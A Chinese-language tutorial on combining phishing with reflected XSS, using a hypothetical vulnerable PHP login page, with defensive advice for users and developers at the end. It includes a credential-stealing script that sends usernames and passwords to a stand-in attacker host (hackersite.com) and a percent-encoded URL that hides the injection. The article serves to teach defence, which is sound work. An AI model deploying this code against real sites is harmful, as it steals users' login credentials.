網路釣魚實例 - 結合 XSS 攻擊

所謂網路釣魚（phishing）是駭客透過垃圾郵件發送與合法網站相仿的寄件人及郵件內容，提供偽裝 （spoofing）的連結，誘騙使用者到進入其偽裝的網站，藉以騙取個人帳號及密碼。其實，要辨識這樣的偽裝連結並不難，你可以先將滑鼠移到連結上，留意瀏覽器左下方的狀態列所顯示的真正網址，就能辨其真偽。但本文接下來要介紹的是比這類詐騙郵件更為狡猾的網路釣魚攻擊，是一種與跨網站指令碼 (Cross-site scripting，簡稱為 XSS) 搭配組合的攻擊模式，讓人防不勝防。此攻擊模式是利用存在 XSS 弱點的網站，在其官方網址的參數欄位動手腳加入經編碼的惡意程式，讓使用者誤信這是該網站所提供的網址，而不自覺地落入駭客惡意設下的圈套。

Phishing 與 XSS 搭配攻擊
假設有個受信任的網站 trustedsite.com，其登入網頁的部份原始碼如下：

<-- Hypothetical login.php page -->
...
<?php echo $_REQUEST["msg"]; ?>
<form method="post" action="loginDone.php">
Username:<input type="text" name="username" maxlength="16"><br>
Password:<input type="text" name="pass" maxlength="16"><br>
<input type="submit" value="Login"><br>
<input type="hidden" name="returnUrl" value="<?php echo $_REQUEST["returnUrl"]; ?>">
</form>
...

當匿名使用者要求檢視個人資料的網頁時，會被系統自動導向到登入網頁，其網址如下：

http://trustedsite.com/login.php?msg=Please+Sign+In+to+View+this+Profile&returnUrl=myProfile.php

在沒有過濾字元的情況下，透過網址的傳遞參數注入如下所示的 HTML 標籤及指令碼：

login.php?msg=<script>alert('Vulnerable!');</scrpt>
&returnUrl="><script>alert('Vulnerable!');</scrpt><input type="hidden

並重新發出 HTTP 請求，便會得到如下的 HTML 輸出內容，並觸發注入的指命碼：

...
<script>alert('Vulnerable!');</scrpt>
<form method="post" action="loginDone.asp">
Username:<input type="text" name="username" maxlength="16"><br>
Password:<input type="text" name="pass" maxlength="16"><br>
<input type="submit" value="Login"><br>
<input type="hidden" name="returnUrl" value=""><script>alert('Vulnerable!');</scrpt><input type="hidden">
</form>
...

根據 XSS 攻擊原理，只要存在 XSS 漏洞的網頁程式就能順利執行惡意程式碼。以下是針對 trustedsite.com 登入網頁，所設計的攻擊指命碼：

/* phishing.js */
var userslogin = document.forms[0];
userslogin.onsubmit = function() {
var iframe = document.createElement("iframe");
iframe.style.display = "none";
iframe.src = "http://hackersite.com/stealLogin.php?user=" + userslogin.username.value + "&pass=" + userslogin.pass.value;
document.body.appendChild(iframe);
};

並將登入網址重新設計如下：

http://trustedsite.com/login.php?msg=<script src="http://hackersite.com/phishing.js"></script>

為衍人耳目，駭客會刻意將注入的 HTML 標籤及指令碼字串編碼，如下所示：

http://trustedsite.com/login.php?msg=%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%68%61%63%6B%65%72%73%69%74%65%2E%63%6F%6D%2F%70%68%69%73%68%69%6E%67%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E

接著只要利用 E-Mail 或者在網路上發佈此連結，誘騙使用者點選此連結登入，使用者帳號及密碼就會自動"異地備份"到駭客手上了。

如何防範
一般使用者不論是在電子郵件、即時通訊軟體或是一般網頁中點選連結時，應提高警覺，留心可疑的過長連結，尤其是連續性冗長的編碼的字串更應避而遠之。

至於，對 XSS 漏洞的防範，在這裡提供幾點建議供 Web 開發人員參考：

1. 對使用 HTTP GET 方法傳遞的資料，加入防竄改（tamper-proof）機制。有關如何實作 URL tamper-proof 的詳細資訊可參考這裡。
2. 檢查使用者的任何輸入資訊，包含查詢字串、Cookie 或表單欄位，並拒絕任何具危害性的 HTML 標籤。如果你的網頁允許輸入 HTML 資料，也應該限制只允許輸入特定的 HTML 標籤。
3. 使用 HTML 編碼輸出使用者的輸入資訊。

相關資源：
Passing Tamper-Proof QueryString Parameters by Scott Mitchell

參考文章：
Applying XSS to Phishing Attacks by Nexus

網路釣魚實例 - 結合 XSS 攻擊